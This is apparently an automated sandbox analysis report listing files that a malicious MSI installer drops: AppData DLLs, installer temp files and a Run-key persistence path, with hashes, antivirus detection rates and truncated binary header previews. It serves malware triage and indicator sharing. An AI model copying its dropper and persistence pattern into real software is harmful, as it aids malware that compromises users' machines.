                                                                                              SHA-512:6C37F8890FFE8A89D143E00A0E1368AF1A43BD9D42025E185D879F61FE7307BCE60C4055EAB4DA3A00CD1E13F1CB21B5B0548BAE48087C960B49C3B7EB529878
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....z.a.................l6...Y.....p.6.......6...@..................................................................8......`8.`;...P=...S...................8.8~..................................................xj8.8.....8.d....................text....C6......D6................. ..`.itext...&...`6..(...H6............. ..`.data....F....6..H...p6.............@....bss....<v....7..........................idata..`;...`8..<....7.............@....didata.d.....8.......7.............@....edata........8.......8.............@..@.rdata..E.....8.......8.............@..@.reloc..8~....8.......8.............@..B.rsrc.....S..P=...S...<.............@..@...................................@..@........................................................
                                                                                              C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\libeay32.dll
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1364480
                                                                                              Entropy (8bit):6.849469574012021
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:47pG+KpPqMxEvaVU5nXfVI4pn6GDgq5jUcKQHgpoWqYCSd1EXE:1Sc8lX9zp6GMYj5HgpoWqYCSd1EXE
                                                                                              MD5:1F3D6EA5E7DAB4126B5315261785408B
                                                                                              SHA1:5A138F31B36FA689F783BB1325A34566FA725865
                                                                                              SHA-256:FC66F65545E6F8D875E82509BCB4ED4BD3DF1869734D8F4FD206C9B7E8726499
                                                                                              SHA-512:D37237BAF8D0054C87B303758941E7180FCD40B63DEA44C3E66C3E0D9BF9D23F8EA0BB47DD7CB0EDB73C56E471C71520D9AAF8BBC36850E6A6FFD45BC794AF48
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: QnL9fgKdsQ.msi, Detection: malicious, Browse
                                                                                              • Filename: xAOifTxDjQ.msi, Detection: malicious, Browse
                                                                                              • Filename: 2J8kWwjwLb.msi, Detection: malicious, Browse
                                                                                              • Filename: O2CRPOKa23.msi, Detection: malicious, Browse
                                                                                              • Filename: RcyPYGBl8t.msi, Detection: malicious, Browse
                                                                                              • Filename: OHqOvvjgbN.msi, Detection: malicious, Browse
                                                                                              • Filename: 2OfuyvjJu1.msi, Detection: malicious, Browse
                                                                                              • Filename: gxJ83rJkgw.msi, Detection: malicious, Browse
                                                                                              • Filename: pHEiqE9toa.msi, Detection: malicious, Browse
                                                                                              • Filename: 50r72IVfM0.msi, Detection: malicious, Browse
                                                                                              • Filename: 83ONlZMwS9.msi, Detection: malicious, Browse
                                                                                              • Filename: Dxr7myLbG2.msi, Detection: malicious, Browse
                                                                                              • Filename: UT3vK4jelb.msi, Detection: malicious, Browse
                                                                                              • Filename: SlNXe5bAfS.msi, Detection: malicious, Browse
                                                                                              • Filename: bnFy9sHX4b.msi, Detection: malicious, Browse
                                                                                              • Filename: yDyyjJtYWT.msi, Detection: malicious, Browse
                                                                                              • Filename: y0kQ1qNTGJ.msi, Detection: malicious, Browse
                                                                                              • Filename: GeruDanfe.msi, Detection: malicious, Browse
                                                                                              • Filename: banload.bat, Detection: malicious, Browse
                                                                                              • Filename: TJ-eProtestoBoletoIndevido.msi, Detection: malicious, Browse
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..J%..%..%..,......,...>..%......!.....%..0..,......,...$..,...$..,...$..Rich%..................PE..L....6)W...........!.....L...........v.......`...............................@......%Z..............................@...r...|...x.......0..........................pb..............................@...@............`..(............................text....K.......L.................. ..`.rdata...V...`...X...P..............@..@.data............t..................@....rsrc...0...........................@..@.reloc..h............"..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\ssleay32.dll
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):335872
                                                                                              Entropy (8bit):6.513381357596429
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:dLO38jiCYCDntquD5aaQn4jQiA/EhNmYDn2J8mZaEZn3WIV/Yx0w1kFvm8ZHValx:ZO38jiCYCDntquDbQn4jQiA/EhNPT2Jy
                                                                                              MD5:A71BB55BE452A69F69A67DF2FE7C4097
                                                                                              SHA1:D2AB6D7ACF2647827155D9BD3D9D4ECA57EB2FCE
                                                                                              SHA-256:FF6C7F1C9DCFF3B3A90CF57A9B4341DDA0D76ADB9E8667B4A3F75E15A2B7A832
                                                                                              SHA-512:D0F7342266D9F9FA34B47564181A169DCF3FB518406F418BF0622C0E1ED5D849FA4C7816C0FE1542FC41E266BF3182ED2FFA49AC8247054A0B60F96B2BA4661A
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r.......r.......r......r......r...s.4.r....\.r.......r......r......r.Rich..r.................PE..L....6)W...........!.........l......9,.......................................p......................................p....)......<.... ..0....................0..t,..0................................{..@............................................text...J........................... ..`.rdata..............................@..@.data....[.......@..................@....rsrc...0.... ......................@..@.reloc..f3...0...4..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\4c6e29.msi
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {90C8377A-5982-4C58-B235-2331AE02F8EE}, Number of Words: 10, Subject: BND0WEPWEJFC-9UEWFF, Author: WEFHWE0-FWEUY-F9WUEFWWEF, Name of Creating Application: Advanced Installer 16.5 build 8df7ad95, Template: ;1046, Comments: F3WBNWE09WE8FY0-WE9FJP, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                              Category:dropped
                                                                                              Size (bytes):2307584
                                                                                              Entropy (8bit):6.572729935205617
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:nglrz5io+HGGWxyzYlrXVVdWgAhmLQr+uclpUO3mDOSP9HnoA/s5tFsy3I1XF2Et:LGGWDlDAhmLpUUEXF2DY
                                                                                              MD5:55B75999AEBA3CCFD5309B39D7880BAA
                                                                                              SHA1:293A2C7CD6AB5851563D868D549E9A2DFD00842C
                                                                                              SHA-256:E07E5F0295DEB4C8A77519CF41D915046D6962DB92B7E667F68267D30E0B8399
                                                                                              SHA-512:59A8BAD2040260F13EC4171E5CE6F28B04B1D6705AED4D7C9A9270C472062095BD4EC8CDC38FE962A55B8F8BC0B8F5AFC4565D99F3DFFEE87DC12B107F9FD76F
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...................$...........................................................................................................................................<...=...>...?...@...A...B.......r...................................................................................................................................................................................................................................................................................................................c.............../...#........................................................................................... ...!..."...-.......%...&...'...(...)...*...+...,.......0...5...C...1...2...3...4...7...6...@...8...9...:...;...<...=...>...?.......A...B...H...D...E...F...G.......I...b...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......d...v...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...w.......x...y...z...
                                                                                              C:\Windows\Installer\MSI71A4.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388768
                                                                                              Entropy (8bit):6.418626127429021
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:AtBnIPLnkhsByA5mx1d6N/mFoO86j6HHIBVjdpU2bupEP4xzGi6Sc9AOZ0MrVK2Z:AtBqnkbIQ6HHI/RpXupEP49v63zLrVVb
                                                                                              MD5:305A50C391A94B42A68958F3F89906FB
                                                                                              SHA1:4110D68D71F3594F5D3BDFCA91A1C759AB0105D4
                                                                                              SHA-256:F89C4313F2F4BC8654A7FA3697702E36688E8C2756DF5ADA209A7F3E3F1D906F
                                                                                              SHA-512:FCAD17CE34E35DE6F0C7259E92ACC842DB2E68008CF45E628B18D71CB3BFFCFCA35E233CD8AE5EB2AE758B8A6503DBE832DD70038432CCBD56C99CD45DA535F7
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......F.e.............g.......g..........E...................g.......g.......g...........J.......P...................................Rich............................PE..L......].........."!.........0.......;....................................................@..........................k.......s..........0........................B......p...............................@............................................text............................... ..`.rdata..............................@..@.data...X............|..............@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI74A2.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388768
                                                                                              Entropy (8bit):6.418626127429021
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:AtBnIPLnkhsByA5mx1d6N/mFoO86j6HHIBVjdpU2bupEP4xzGi6Sc9AOZ0MrVK2Z:AtBqnkbIQ6HHI/RpXupEP49v63zLrVVb
                                                                                              MD5:305A50C391A94B42A68958F3F89906FB
                                                                                              SHA1:4110D68D71F3594F5D3BDFCA91A1C759AB0105D4
                                                                                              SHA-256:F89C4313F2F4BC8654A7FA3697702E36688E8C2756DF5ADA209A7F3E3F1D906F
                                                                                              SHA-512:FCAD17CE34E35DE6F0C7259E92ACC842DB2E68008CF45E628B18D71CB3BFFCFCA35E233CD8AE5EB2AE758B8A6503DBE832DD70038432CCBD56C99CD45DA535F7
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......F.e.............g.......g..........E...................g.......g.......g...........J.......P...................................Rich............................PE..L......].........."!.........0.......;....................................................@..........................k.......s..........0........................B......p...............................@............................................text............................... ..`.rdata..............................@..@.data...X............|..............@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI759D.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388768
                                                                                              Entropy (8bit):6.418626127429021
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:AtBnIPLnkhsByA5mx1d6N/mFoO86j6HHIBVjdpU2bupEP4xzGi6Sc9AOZ0MrVK2Z:AtBqnkbIQ6HHI/RpXupEP49v63zLrVVb
                                                                                              MD5:305A50C391A94B42A68958F3F89906FB
                                                                                              SHA1:4110D68D71F3594F5D3BDFCA91A1C759AB0105D4
                                                                                              SHA-256:F89C4313F2F4BC8654A7FA3697702E36688E8C2756DF5ADA209A7F3E3F1D906F
                                                                                              SHA-512:FCAD17CE34E35DE6F0C7259E92ACC842DB2E68008CF45E628B18D71CB3BFFCFCA35E233CD8AE5EB2AE758B8A6503DBE832DD70038432CCBD56C99CD45DA535F7
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......F.e.............g.......g..........E...................g.......g.......g...........J.......P...................................Rich............................PE..L......].........."!.........0.......;....................................................@..........................k.......s..........0........................B......p...............................@............................................text............................... ..`.rdata..............................@..@.data...X............|..............@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI7689.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):845472
                                                                                              Entropy (8bit):6.505535494243434
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:XDcc4Pu2Qr+uclBDUO3mDOSP9HnoA/s5tFs6:XmLQr+uclpUO3mDOSP9HnoA/s5tFs6
                                                                                              MD5:7E68B9D86FF8FAFE995FC9EA0A2BFF44
                                                                                              SHA1:06AFC5448037DC419013C3055F61836875BC5E02
                                                                                              SHA-256:FB4FF113EE64DD8D9AA92A3B5C1D1CD0896A1CC8B4C3768D1CACDE2F52F41D58
                                                                                              SHA-512:6E22AFD350F376969DE823B033394324D3C2433C196515624A84B8E5160EA228FDAAC0699E76466AE1F30155FC44F61697EFB9E1ECA9A67670AFF25E6EE67A5C
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...fn.Mfn.Mfn.M...Lhn.M...L.n.Mg..L7n.Mg..Lwn.Mg..Lpn.M...L~n.M...Lgn.M...LGn.Mfn.M|o.M...LKn.M...Lgn.M..=Mgn.MfnUMgn.M...Lgn.MRichfn.M........PE..L......].........."!.........@......6 ...............................................E....@......................... S..t....S..,.... .......................0......P5..p............................5..@............................................text............................... ..`.rdata..<...........................@..@.data...8....p.......T..............@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI77C2.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388768
                                                                                              Entropy (8bit):6.418626127429021
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:AtBnIPLnkhsByA5mx1d6N/mFoO86j6HHIBVjdpU2bupEP4xzGi6Sc9AOZ0MrVK2Z:AtBqnkbIQ6HHI/RpXupEP49v63zLrVVb
                                                                                              MD5:305A50C391A94B42A68958F3F89906FB
                                                                                              SHA1:4110D68D71F3594F5D3BDFCA91A1C759AB0105D4
                                                                                              SHA-256:F89C4313F2F4BC8654A7FA3697702E36688E8C2756DF5ADA209A7F3E3F1D906F
                                                                                              SHA-512:FCAD17CE34E35DE6F0C7259E92ACC842DB2E68008CF45E628B18D71CB3BFFCFCA35E233CD8AE5EB2AE758B8A6503DBE832DD70038432CCBD56C99CD45DA535F7
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......F.e.............g.......g..........E...................g.......g.......g...........J.......P...................................Rich............................PE..L......].........."!.........0.......;....................................................@..........................k.......s..........0........................B......p...............................@............................................text............................... ..`.rdata..............................@..@.data...X............|..............@....rsrc...0...........................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI79B7.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1902355
                                                                                              Entropy (8bit):6.578517920919342
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:J3I1XF2ETQuVcJF6D3I1XF2ETQuVcJF6w3I1XF2ETQuVcJF6K3I1XF2ETQuVcJFk:GXF2zXF2IXF2sXF2k
                                                                                              MD5:4E6B9DCCFFEA907F754D295B625684CB
                                                                                              SHA1:F12DD25F1BF9395FAC7143C726DC35A8E1D029DF
                                                                                              SHA-256:5640044EBF1743421E4C06AB53B8BA7F995664EBDFD2009495C41219DDB29974
                                                                                              SHA-512:F16C4B9C066637E4C249E47D10BB0E1D8ADB9D3884AD16A372C2D3F300ADAC293685D3ADAA3EE4BA70CC20D55E6FDD198FCA86C01AAD889A663916AFC20EB44C
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ...@IXOS.@.....@$..S.@.....@.....@.....@.....@.....@......&.{C5886386-F26F-4C16-A501-438E40C8CBDA}..BND0WEPWEJFC-9UEWFF..RT.msi.@.....@.....@.....@........&.{90C8377A-5982-4C58-B235-2331AE02F8EE}.....@.....@.....@.....@.......@.....@.....@.......@......BND0WEPWEJFC-9UEWFF......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{DE47952B-D8FE-4B26-B511-B2A34B2BBA7F}..01:\Software\Microsoft\Windows\CurrentVersion\.@.......@.....@.....@......&.{9BF9874A-F4C7-49E4-A163-A1613DDEE8B7}..01:\Software\Microsoft\.@.......@.....@.....@......&.{708DDFE6-3C6B-455B-94B1-25D4771F9C73}A.01:\Software\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Version.@.......@.....@.....@......&.{9FBCF334-2685-443B-B297-E6CAD4889E64}2.01:\Software\Microsoft\Windows\CurrentVersion\Run\.@.......@.....@.....@......&.{EADA3D85-CAF6-4403-8638-6A283DB68C9E}..01:\Sof
                                                                                              C:\Windows\Installer\MSI7A16.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474784
                                                                                              Entropy (8bit):6.576903062915206
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:T5S5BVgOvVB9mqrgXswCPFIWX5PIL4mu41lJYfx01NTpZ5G5uV+vJZLT+/:G3IqMXSpS2SDTQuV+vJF6/
                                                                                              MD5:DD777ABC5E3ABFF6E35F866470FD8D2D
                                                                                              SHA1:11D68B3CF2F9628729622E76E82CE58F3B8D4561
                                                                                              SHA-256:C1C922E7B8ADDF20A1F8C01FB7333E4341E5BD43EA90B82025E4402CD016D3ED
                                                                                              SHA-512:AA21B5D920AC9260EB35A421F071C95E83C31A5545762CA12F2B8A05A543D4AC90095ACE83C37AA3B3C69135DEE091E0BE7E38A2BCA45A474362DA479C3B0C1E
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........X..9s..9s..9s.._p..9s.._v./9s.._w..9s..Tv..9s..Tw..9s..Tp..9s.WTw..9s.WTp..9s.._r..9s..9r..8s.WTz..9s.WTs..9s.WT...9s..9.9s.WTq..9s.Rich.9s.................PE..L......].........."!.........:..............................................`............@.............................D............................$...........E...R..p............................R..@............................................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...E.......F..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI7B7E.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474784
                                                                                              Entropy (8bit):6.576903062915206
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:T5S5BVgOvVB9mqrgXswCPFIWX5PIL4mu41lJYfx01NTpZ5G5uV+vJZLT+/:G3IqMXSpS2SDTQuV+vJF6/
                                                                                              MD5:DD777ABC5E3ABFF6E35F866470FD8D2D
                                                                                              SHA1:11D68B3CF2F9628729622E76E82CE58F3B8D4561
                                                                                              SHA-256:C1C922E7B8ADDF20A1F8C01FB7333E4341E5BD43EA90B82025E4402CD016D3ED
                                                                                              SHA-512:AA21B5D920AC9260EB35A421F071C95E83C31A5545762CA12F2B8A05A543D4AC90095ACE83C37AA3B3C69135DEE091E0BE7E38A2BCA45A474362DA479C3B0C1E
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........X..9s..9s..9s.._p..9s.._v./9s.._w..9s..Tv..9s..Tw..9s..Tp..9s.WTw..9s.WTp..9s.._r..9s..9r..8s.WTz..9s.WTs..9s.WT...9s..9.9s.WTq..9s.Rich.9s.................PE..L......].........."!.........:..............................................`............@.............................D............................$...........E...R..p............................R..@............................................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...E.......F..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSI7FC6.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474784
                                                                                              Entropy (8bit):6.576903062915206
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:T5S5BVgOvVB9mqrgXswCPFIWX5PIL4mu41lJYfx01NTpZ5G5uV+vJZLT+/:G3IqMXSpS2SDTQuV+vJF6/
                                                                                              MD5:DD777ABC5E3ABFF6E35F866470FD8D2D
                                                                                              SHA1:11D68B3CF2F9628729622E76E82CE58F3B8D4561
                                                                                              SHA-256:C1C922E7B8ADDF20A1F8C01FB7333E4341E5BD43EA90B82025E4402CD016D3ED
                                                                                              SHA-512:AA21B5D920AC9260EB35A421F071C95E83C31A5545762CA12F2B8A05A543D4AC90095ACE83C37AA3B3C69135DEE091E0BE7E38A2BCA45A474362DA479C3B0C1E
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........X..9s..9s..9s.._p..9s.._v./9s.._w..9s..Tv..9s..Tw..9s..Tp..9s.WTw..9s.WTp..9s.._r..9s..9r..8s.WTz..9s.WTs..9s.WT...9s..9.9s.WTq..9s.Rich.9s.................PE..L......].........."!.........:..............................................`............@.............................D............................$...........E...R..p............................R..@............................................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...E.......F..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSIAF72.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474784
                                                                                              Entropy (8bit):6.576903062915206
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:T5S5BVgOvVB9mqrgXswCPFIWX5PIL4mu41lJYfx01NTpZ5G5uV+vJZLT+/:G3IqMXSpS2SDTQuV+vJF6/
                                                                                              MD5:DD777ABC5E3ABFF6E35F866470FD8D2D
                                                                                              SHA1:11D68B3CF2F9628729622E76E82CE58F3B8D4561
                                                                                              SHA-256:C1C922E7B8ADDF20A1F8C01FB7333E4341E5BD43EA90B82025E4402CD016D3ED
                                                                                              SHA-512:AA21B5D920AC9260EB35A421F071C95E83C31A5545762CA12F2B8A05A543D4AC90095ACE83C37AA3B3C69135DEE091E0BE7E38A2BCA45A474362DA479C3B0C1E
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........X..9s..9s..9s.._p..9s.._v./9s.._w..9s..Tv..9s..Tw..9s..Tp..9s.WTw..9s.WTp..9s.._r..9s..9r..8s.WTz..9s.WTs..9s.WT...9s..9.9s.WTq..9s.Rich.9s.................PE..L......].........."!.........:..............................................`............@.............................D............................$...........E...R..p............................R..@............................................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...E.......F..................@..B........................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\MSIBA90.tmp
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):413856
                                                                                              Entropy (8bit):6.589865940784009
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:i4HyzQyz5io+HEbdG7U674UdfE+jwbuTphIvQZy9q8oi9:iyyzQyz5io+HExGWUAyiqZI
                                                                                              MD5:A34D4F165087B11D9E06781D52262868
                                                                                              SHA1:1B7B6A5BB53B7C12FB45325F261AD7A61B485CE1
                                                                                              SHA-256:55AD26C17F4AAC71E6DB6A6EDEE6EBF695510DC7E533E3FEE64AFC3EB06291E5
                                                                                              SHA-512:AA62FF3B601DDB83133DD3659B0881F523454DC7EEA921DA7CFEFC50426E70BB36B4EBC337A8F16620DA610784A81A8E4AA1CF5E0959D28AA155D1F026A81AAF
                                                                                              Malicious:true
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..KV..KV..K3..JX..K3..J..KW..J...KW..JD..KW..J@..K3..JA..K3..JW..K3..JE..KV..K...K...JD..K...KW..KV.fKW..K...JW..KRichV..K........PE..L......].........."......p........................@.................................C(....@..........................................0...............6.......@...;..@...p...............................@............................................text....o.......p.................. ..`.rdata..2c.......d...t..............@..@.data....7..........................@....rsrc........0......................@..@.reloc...;...@...<..................@..B................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\SourceHash{C5886386-F26F-4C16-A501-438E40C8CBDA}
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):1.1618481532406983
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:JSbX72FjHG6AGiLIlHVRpBh/7777777777777777777777777vDHFyFV7u+pOl0G:Jx5QI5VcJjF
                                                                                              MD5:7068AED1E12E95A5FE4E852F387E29E3
                                                                                              SHA1:BDD8BF13BBAB7DBCEF8F93522EE82D0AF0121E51
                                                                                              SHA-256:DD50C57824967F373F77E0B2568F641CD367814699BF0785D48123F47106EBEC
                                                                                              SHA-512:0852DF289E16EFB04B0C4240C26D529D8777772C09068EB81D69F20A3ECF6675E8A498F4C8EC057F589D9CB92EB7723E4BA41F38F1546DE8AD5BB9281F9144C8
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Installer\inprogressinstallinfo.ipi
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):1.5831763444891178
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:f8PhluRc06WXOknT5dKtnSKpAEKgCy4okVnSKtT01rQr5:ehl1SnTGV4kChcrQN
                                                                                              MD5:855FFB70E32FB384D7CC75A5373BDF90
                                                                                              SHA1:70E6C9BAE7311140AE2F4C1004F364243433CBC0
                                                                                              SHA-256:6B050B89F967D15011E20855C8B7111478BA509D7AE076775FE597F2D00A63E7
                                                                                              SHA-512:B58E0861FC564DF5A503E8590F3599D4DD04AEDB302AD318C2F5D8A2F4AE73EB9D57882F632C1F40DDF1DD13E98BF4647459144209C1CB27F6EA344617161C9F
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):122558
                                                                                              Entropy (8bit):5.363478037734152
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:iHzMV+f84vcIH17Yyxkjr0+NVRVle+yjeLWJOQzi7gZFOIKICh/81r8yQ1oXB4H4:iHHJCoX5C4
                                                                                              MD5:64F2147AB179F2C7EB37B86F811DAC05
                                                                                              SHA1:86F1FBC767AB5C9103B08957A4BB50092C819415
                                                                                              SHA-256:EC1D6933B1678A465E61ECF027271319E132D3923296ADE7EED22037597F9168
                                                                                              SHA-512:4541586C112EC4B1F401C298D41A430171A32E3EEEA131331C3946984B3D4B6DA251604DEE045FE5072F51BD2AACA97DFA366214B200293C8A087513943F7C6A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
